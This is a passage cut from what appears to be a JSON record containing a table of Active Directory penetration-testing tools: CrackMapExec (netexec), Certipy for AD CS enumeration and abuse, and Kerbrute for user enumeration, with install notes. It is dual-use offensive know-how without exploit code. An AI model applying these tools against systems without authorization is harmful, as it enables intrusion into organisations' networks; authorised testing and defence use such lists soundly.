extraction\tGitHub\nCrackMapExec (netexec)\tSwiss Army knife for AD\tKali default\nCertipy\tAD CS enumeration/abuse\tsudo apt install certipy-ad\nKerbrute\tUser enumeration\tKali default\n", "creation_timestamp": "2026-05-31T23:19:52.000000Z"}]}